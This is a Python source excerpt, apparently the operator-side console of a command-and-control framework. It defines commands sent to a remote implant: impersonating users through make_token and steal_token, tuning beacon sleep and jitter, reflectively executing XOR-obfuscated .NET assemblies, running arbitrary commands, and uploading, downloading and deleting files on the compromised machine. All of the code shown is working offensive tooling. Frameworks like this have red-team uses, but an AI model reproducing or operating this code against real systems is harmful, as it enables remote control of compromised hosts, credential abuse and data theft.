def do_make_token(self, args: argparse.Namespace):
""" Impersonate a user's token. """
domain_b64 = string_to_base64(args.domain)
user_b64 = string_to_base64(args.username)
password_b64 = string_to_base64(args.password)
self.post_job(
f'"name":"make_token","arguments":"{domain_b64},{user_b64},{password_b64}","type":1'
)
def do_delay(self, args: argparse.Namespace):
""" Change the sleep and jitter to alter the check_in interval. """
if args.sleep:
sleep = string_to_base64(str(float(args.sleep)))
self.post_job(f'"name":"set sleep","arguments":"{sleep}","type":1')
if args.jitter:
if 0 > float(args.jitter) or float(args.jitter) > 100:
print_error(
'Please set jitter to a number between 0 and 100 inclusive.'
)
return
jitter = string_to_base64(str(float(args.jitter)))
self.post_job(
f'"name":"set jitter","arguments":"{jitter}","type":1')
if not args.jitter and not args.sleep:
self.post_job(f'"name":"delay","arguments":"","type":1')
def do_execute_assembly(self, args: argparse.Namespace):
""" Executes a .NET assembly with reflection """
with open(args.assembly, 'rb') as fd:
key, file = xor_base64(fd.read())
arg_str = ''
for arg in args.args:
arg_str = arg_str + ',' + string_to_base64(arg)
self.post_job(
f'"name":"execute_assembly","arguments":"{key},{file}{arg_str}","type":1'
)
def do_steal_token(self, args: argparse.Namespace):
""" Impersonate a processes token. """
pid_b64 = string_to_base64(args.pid)
self.post_job(f'"name":"steal_token","arguments":"{pid_b64}","type":1')
def do_dir(self, args: argparse.Namespace):
""" List the contents and properties of a directory. """
directory = string_to_base64(args.dir)
self.post_job(f'"name":"dir","arguments":"{directory}","type":1')
def do_cmd(self, args: argparse.Namespace):
""" Execute a command. """
command = string_to_base64(args.command)
self.post_job(f'"name":"cmd","arguments":"{command}","type":1')
def do_upload(self, args: argparse.Namespace):
""" Uploads a file to the remote machine. """
with open(args.file, 'rb') as fd:
file = bytes_to_base64(fd.read())
path = string_to_base64(args.path)
self.post_job(f'"name":"upload","arguments":"{file},{path}","type":1')
def do_download(self, args: argparse.Namespace):
""" Download a remote file. """
file = string_to_base64(args.file)
self.post_job(f'"name":"download","arguments":"{file}","type":2')
def do_delfile(self, args: argparse.Namespace):
""" Delete a file. """
file = string_to_base64(args.file)
self.post_job(f'"name":"delfile","arguments":"{file}","type":1')